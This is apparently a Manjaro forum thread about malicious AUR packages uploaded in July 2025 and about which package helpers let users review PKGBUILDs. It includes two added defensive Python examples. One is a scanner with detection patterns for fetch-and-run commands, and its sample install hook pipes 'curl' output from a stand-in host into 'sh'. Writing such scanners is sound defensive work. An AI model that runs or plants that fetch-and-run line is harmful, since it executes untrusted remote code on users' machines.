Some AUR packages were uploaded containing malware (2025-07-18)

Not just one, I saw a few in my feed - first ‘google-chrome-bin’ but also ‘chrome-bin’ 15 hours ago,

2 Likes

…yes, indeed. There were quite a few.

Thanks to everyone that keeps an eye on new AUR package submissions and submits deletion requests for garbage of any kind - Arch Linux team members were able to remove them within hours. More than likely not a single user installed any of them.

8 Likes

It’s maybe time to stop AUR submission in some way… Control more what’s going on there…

If the trend continues - I am fairly certain some control measures will be put in place.

The latest incidents only confirm what has been written and said for years.

Warning: AUR packages are user-produced content. These PKGBUILDs are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.

Arch User Repository - ArchWiki

And possibly why Arch Linux does not provide any AUR helper scripts.

4 Likes

Sure, perhaps there’s going to be some kind of buffer - or at least a warning for freshness… these are only brand new uploads, and overall they don’t look as if they can catch anyone more than a few fresh PewDiePie fans.

I’m not really worried by them at all, but I’m slightly annoyed at the social fallout - just last night someone using Fedora boasted how they’re happy they’re not dealing with a ‘malware infested AUR’.

1 Like

A guess - it was a Reddit user?

It tells me it is a consumer… Manjaro gets that kind of user from time to time - especially when Manjaro is praised on a YouTube video - the next thing that happens is… well - history

3 Likes

Some things about pamac are excellent, for example - the GUI. Open it and type ‘chrome’ or even ‘google chrome’:

Click through to get excellent details (last modified, FIRST SUBMITTED, Maintainer/Votes…)…

However, no pkgbuild.

From the terminal:

pamac search chrome
pamac search google-chrome

Well yes, there’s no fuzzy delight as with the GUI here… but the latter line gives us a colourless readout… and no click-through or index number to select an option to go to the info page.

This should be added:

```
    Standalone server that implements the W3C WebDriver standard (for google-chrome)
metamask-google-chrome  12.18.1-1  AUR
    Browser extension that enables browsing Ethereum blockchain enabled websites
4. google-chrome-dev  140.0.7327.6-1  (AUR)
    The popular web browser by Google (Dev Channel)
3. google-chrome-canary  140.0.7328.0-1  (AUR)
    The popular web browser by Google (Canary Channel)
2. google-chrome-beta  139.0.7258.66-1  (AUR)
    The popular web browser by Google (Beta Channel)
1. google-chrome  138.0.7204.183-1  (AUR)
```

So then hitting number 1. should go first to the initial review:

Summary

Name : google-chrome
Version : 138.0.7204.183-1
Description : The popular web browser by Google (Stable Channel)
URL : Google Chrome - The Fast & Secure Web Browser Built to be Yours
Licences : custom:chrome
Repository : AUR
Groups : –
Depends On : alsa-lib gtk3 libcups libxss libxtst nss ttf-liberation xdg-utils
Optional Dependencies : pipewire [Installed]
kdialog [Installed]
gnome-keyring
kwallet [Installed]
Make Dependencies : –
Check Dependencies : –
Provides : –
Replaces : –
Conflicts With : –
Maintainer : gromit
First Submitted : Wed 26 May 2010 03:25:56 +07
Last Modified : Wed 30 Jul 2025 04:37:57 +07
Votes : 2291
Out of Date : –

With options to then ‘Proceed to review: y/N’ (N then exits or returns to the listing):
Review

```
# Maintainer: Christian Heusel <christian@heusel.eu>
# Contributor: Knut Ahlers
# Contributor: Det
# Contributor: t3ddy, Lex Rivera aka x-demon, ruario, Abdullah

# Check for new Linux releases in: Chrome Releases: Stable updates
# or use: $ curl -sSf https://dl.google.com/linux/chrome/deb/dists/stable/main/binary-amd64/Packages | grep -A1 "Package: google-chrome-stable" | awk '/Version/{print $2}' | cut -d '-' -f1

pkgname=google-chrome
pkgver=138.0.7204.183
pkgrel=1
pkgdesc="The popular web browser by Google (Stable Channel)"
arch=('x86_64')
url="Google Chrome - The Fast & Secure Web Browser Built to be Yours"
license=('custom:chrome')
depends=(
	'alsa-lib'
	'gtk3'
	'libcups'
	'libxss'
	'libxtst'
	'nss'
	'ttf-liberation'
	'xdg-utils'
)
optdepends=(
	'pipewire: WebRTC desktop sharing under Wayland'
	'kdialog: for file dialogs in KDE'
	'gnome-keyring: for storing passwords in GNOME keyring'
	'kwallet: for storing passwords in KWallet'
)
options=('!emptydirs' '!strip')
install=$pkgname.install
_channel=stable
source=("https://dl.google.com/linux/chrome/deb/pool/main/g/google-chrome-${_channel}/google-chrome-${_channel}_${pkgver}-1_amd64.deb"
	'eula_text.html'
	"google-chrome-$_channel.sh")
sha512sums=('76aa8a1cf43f1264fcf81d50a97e8953609cfe77001bcfd7625aff907660584dfb2b9063a2379a7051055c371a27d6b6e08802e6d26cbdb694103765e0dcfc71'
	'a225555c06b7c32f9f2657004558e3f996c981481dbb0d3cd79b1d59fa3f05d591af88399422d3ab29d9446c103e98d567aeafe061d9550817ab6e7eb0498396'
	'de02b498a4b5b93e21622c8dba57befe795d733a04656be911cc38e28bfef0e20470450f44be523bbde8d4de28f79c10434846ca01fc2a2f4e67707b79332f94')

package() {
	bsdtar -xf data.tar.xz -C "$pkgdir/"

	# Launcher
	install -m755 google-chrome-$_channel.sh "$pkgdir"/usr/bin/google-chrome-$_channel

	# Icons
	for i in 16x16 24x24 32x32 48x48 64x64 128x128 256x256; do
		install -Dm644 "$pkgdir"/opt/google/chrome/product_logo_${i/x*/}.png \
			"$pkgdir"/usr/share/icons/hicolor/$i/apps/google-chrome.png
	done

	# License
	install -Dm644 eula_text.html "$pkgdir"/usr/share/licenses/google-chrome/eula_text.html
	install -Dm644 "$pkgdir"/opt/google/chrome/WidevineCdm/LICENSE \
		"$pkgdir"/usr/share/licenses/google-chrome-$_channel/WidevineCdm-LICENSE.txt

	# Fix the Chrome desktop entry
	sed -i \
		-e "/Exec=/i\StartupWMClass=Google-chrome" \
		-e "s/x-scheme-handler\/ftp;\?//g" \
		"$pkgdir"/usr/share/applications/google-chrome.desktop

	# Remove the Debian Cron job, duplicate product logos and menu directory
	rm -r \
		"$pkgdir"/etc/cron.daily/ \
		"$pkgdir"/opt/google/chrome/cron/ \
		"$pkgdir"/opt/google/chrome/product_logo_*.{png,xpm} \
		"$pkgdir"/usr/share/menu/
}
```

With yay and paru my ‘Review’ presents the pkgbuild open with micro at the moment… to read and possibly edit.

Finally closing that with the option to continue or abort and clean up.

1 Like

You would expect the PKGBUILD to be proudly displayed on demand? Seriously? Yes! Seriously!

With pamac-cli we’re able to view/edit the PKGBUILD, and for those who are aware of it; those who have any idea of how the AUR works; that’s a good thing.

That’s not an option in pamac-manager, is it…

Perhaps it should be.

That is, unless knowing the content of a PKGBUILD prior to building is considered unnecessary for target user groups of Pamac.

1 Like

It is an option in octopi.

Jus’ sayin’… :stuck_out_tongue:

1 Like

Indeed.

It just makes sense to have that capability. It shouldn’t be considered a feature to be added on a whim, but a necessity, especially given the recent spate of events.

1 Like

Nowhere was it found what the malicious package actually did. Arch just says to take appropriate measures, well what are those as the package is no longer available so it’s impossible to look at what it did?

It downloaded some kind of malware from a third-party site during installation of the browser, and this malware would become active — but running as a background process — every time the user launched the browser.

What the malware did exactly was not revealed. The two most common exploitations like this would be opening a backdoor into the system — albeit only with the user’s privileges, but if it’s a key logger, then they might be able to read passwords — and/or cryptocurrency mining.

Well, all of that was clear, but I wonder about Arch's practice of not making it explicit so affected users could know what to do…

1 Like
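A review aid for the behaviour described two posts up (a download from a third-party site during installation), added here as an example and not taken from any post or from Arch's or Manjaro's tooling: it flags fetch-and-run commands in build files while skipping comments and the `source=()` array, so the `curl` hint in the legitimate PKGBUILD's header does not trigger it. The pattern list, the `scan` function and the sample `.install` text are assumptions of this example.

```python
import re

# Heuristic patterns (an assumption of this example, not an official rule set).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "network fetch outside source=()"),
    (re.compile(r"\|\s*(ba|z|da)?sh\b"), "output piped into a shell"),
    (re.compile(r"\b(python[0-9.]*|perl|node)\s+-[ce]\b"), "inline interpreter code"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64 decoding"),
    (re.compile(r"\beval\b"), "eval of a constructed string"),
]

def scan(name, text):
    """Return (file, line number, reason) for each suspicious line in one build file."""
    findings, in_source = [], False
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank line or full-line comment (inline comments are not handled)
        if in_source or re.match(r"source(_\w+)?=\(", line):
            # Downloads declared in source=() are expected and checksummed: skip the array.
            in_source = not line.endswith(")")
            continue
        findings += [(name, number, why) for rx, why in SUSPICIOUS if rx.search(line)]
    return findings

# Excerpt of the google-chrome PKGBUILD quoted in this thread.
LEGIT_PKGBUILD = r"""# or use: $ curl -sSf https://dl.google.com/linux/chrome/deb/dists/stable/main/binary-amd64/Packages | grep -A1 "Package: google-chrome-stable" | awk '/Version/{print $2}' | cut -d '-' -f1
pkgname=google-chrome
install=$pkgname.install
source=("https://dl.google.com/linux/chrome/deb/pool/main/g/google-chrome-${_channel}/google-chrome-${_channel}_${pkgver}-1_amd64.deb"
        'eula_text.html'
        "google-chrome-$_channel.sh")
package() {
    bsdtar -xf data.tar.xz -C "$pkgdir/"
    install -m755 google-chrome-$_channel.sh "$pkgdir"/usr/bin/google-chrome-$_channel
}
"""

# Constructed sample of an install hook that fetches and runs remote content.
SUSPECT_INSTALL = """post_install() {
    curl -s https://example.invalid/setup | sh
}
"""

if __name__ == "__main__":
    for finding in scan("PKGBUILD", LEGIT_PKGBUILD) + scan("example.install", SUSPECT_INSTALL):
        print(finding)
```

The same scan applies to every file the PKGBUILD pulls into the build directory, including the `.install` file and the launcher script; an empty result is not a substitute for reading them.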

Maybe the admin who removed it was having a Bad Hair Day™? :stuck_out_tongue:

No-one wants to reveal their sources.

Still, the fact that this can happen at all sends a clear message that the AUR cannot be guaranteed to be relied upon from a security perspective.

Perhaps there should be a MVUR, of sorts. :man_shrugging:

Manjaro (Verified) User Repository.

1 Like

Like, the minimum would be to archive the GitHub script that was executed and any secondary source files it pulled in.

My my, then what happened to Open Source? :astonished:

That would require money and resources we don’t have. :man_shrugging:


Yeah, but maybe the admin in question didn’t want to bother, or simply forgot? :man_shrugging:

Humans are a strange and unreliable species.

1 Like

Yes, yes. It goes hand-in-hand with edible paper, I suppose, but from a conceptual standpoint it should lessen the risk to some extent.

1 Like

Oh, great… so install Octopi… looking in settings, can enable AUR voting - but sadly there’s no logical way to enter credentials (it just opens the AUR website where you can log in, but there’s no visible way to enter these in the GUI).

So maybe you need to write an extensive tutorial that explains just how we can find Chrome in there… 'cos I can’t.

And as our malware friends know, we really want to install Chrome.

Octopi - enter chrome - result…
vlc-plugin-chromecast 3.0.21-27.

Ok, this is your weapon of choice and you’re very welcome to keep it.

In Pamac, you can find the package google-chrome with that search, as with paru - and also with a web search; don’t forget, we have pamac-manager, which brings up:

Google Chrome 138.0.7204.... Flathub
Google Chrome 101.0.4951... Flathub-beta
Google Chrome (unstable) 140.0.7.... Flathub
add Chromium to that list and it's on the first page.
Google-Chrome 138.0.7204 (Stable) (AUR)
ungoogled-chromium-bin
ungoogled-chropmium
google-chrome-dev
google-chrome-beta

Moving on… paru chrome similar results to yay:
9. aur/google-chrome, followed by -dev -beta etc.
pamac search chrome - sucks a bit, no highlighting or colour :frowning: though results are there if you scroll up (but then there’s no index to take you to install it…).

So then you’d follow up with pamac -Si google-chrome to get the first information, then another search for another variant (and ALL variants would be listed with the AUR search:
https://aur.archlinux.org/packages?O=0&SeB=nd&outdated=&SB=p&SO=d&PP=50&K=chrome
better if you then select ‘search by name’.

I’ll be honest, I’m happier with my workflow - just enter ‘AUR google-chrome’ and the page opens in my browser - all the helpers are just scraping partial information from there… and if you START with the browser, you’ll get all the information outside repositories - including AUR, Flatpak and anything else available.

So back to the original story here - there are folks saying ‘Linux needs to protect us’ which is rather amusing.

My preference, however, is to first search - pamac-manager is the first port of call for Manjaro users, so you cannot exclude that (though I know you’d like to), and in this case we found it, clicking through google-chrome we’re then taken to the obligatory summary page, which gives us the first submission date (2010) which is reassuring, the last modified date shows it’s not unmaintained (30th Jul '25) and the Votes are 2291 - very popular gives us some feeling of safety in numbers.

The other huge feature that pamac-manager brings is that IT DISPLAYS THE AUR PAGE LINK prominently at the first review stage… which is where you should always go to review your software before installing.

psycloneeee commented on 2025-08-01 01:33 (UTC): note that the package “google-chrome-stable” has been compromised and will install a RAT on your computer. this package is fine.

I don’t know about octopi 'cos I couldn’t even find the damn thing.

So really, the main improvement I’d like now is that pamac do the same job in the terminal… bringing up a nicely formatted (highlighted and coloured) guide to results with indexing, so we can punch in a number to go through to the next stage which would be similar information to pamac-manager with a link to the full web page and then a link to continue to the install.

That’s all.

Build files can be viewed and edited in Pamac GUI before building

For Pamac CLI use E to view/edit build files in nano

$ pamac build google-chrome
Preparing...
Cloning google-chrome build files...
Generating google-chrome information...
Checking google-chrome dependencies...
Resolving dependencies...
Checking inter-conflicts...

To build (1):
  google-chrome  138.0.7204.183-1    AUR


Edit build files : [e] 
Apply transaction ? [e/y/N]

maybe also: Mad as a hatter - Wikipedia


Arch provided the names of the packages after they were removed so users could check if they were affected

Arch and Manjaro are both explicit that AUR is not officially supported

But AUR is not 'nam, there are submission rules

AUR submission guidelines - ArchWiki

Warning: Before attempting to submit a package you are expected to familiarize yourself with Arch packaging standards and all the articles under “Related articles”. Verify carefully that what you are uploading is correct. Packages that violate the rules may be deleted without warning.

3 Likes
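The freshness warning suggested earlier in the thread, together with the First Submitted and Votes fields read off the pamac summary, can be turned into a check. This is an added example, not part of any post and not code from pamac, yay or paru; it assumes the `Name`, `FirstSubmitted` and `NumVotes` fields of an AUR RPC `info` result, and the `triage` function, its thresholds and the metadata of the second sample record are constructed for illustration.

```python
import difflib
from datetime import datetime, timezone

UTC = timezone.utc

def triage(pkg, established, now, min_age_days=30, min_votes=10):
    """Return reasons to slow down before building `pkg` (an AUR RPC info dict)."""
    reasons = []
    first = datetime.fromtimestamp(pkg["FirstSubmitted"], tz=UTC)
    age_days = (now - first).days
    is_new = age_days < min_age_days
    if is_new:
        reasons.append(f"new upload: first submitted {age_days} day(s) ago")
    if pkg["NumVotes"] < min_votes:
        reasons.append(f"low votes: {pkg['NumVotes']}")
    if is_new:
        # A brand-new package whose name closely resembles a long-standing one
        # deserves a second look at who uploaded it and what it builds.
        for old in established:
            ratio = difflib.SequenceMatcher(None, pkg["Name"], old).ratio()
            if pkg["Name"] != old and ratio >= 0.8:
                reasons.append(f"name resembles established package {old!r}")
    return reasons

def epoch(*parts):
    """UTC calendar fields -> Unix timestamp, the format the RPC uses for dates."""
    return int(datetime(*parts, tzinfo=UTC).timestamp())

# Values shown in the pamac summary in this thread (time converted from +07 to UTC).
GOOGLE_CHROME = {"Name": "google-chrome",
                 "FirstSubmitted": epoch(2010, 5, 25, 20, 25, 56), "NumVotes": 2291}
# Constructed record: the name is one mentioned in the thread, the metadata is made up.
FRESH_UPLOAD = {"Name": "google-chrome-bin",
                "FirstSubmitted": epoch(2025, 7, 17, 9, 0, 0), "NumVotes": 0}
NOW = datetime(2025, 7, 18, 12, 0, 0, tzinfo=UTC)

if __name__ == "__main__":
    for record in (GOOGLE_CHROME, FRESH_UPLOAD):
        print(record["Name"], triage(record, ["google-chrome"], NOW))
```

A name that does not resemble an established package is still caught by the age and vote checks; the similarity test only adds a reason, it never clears a package.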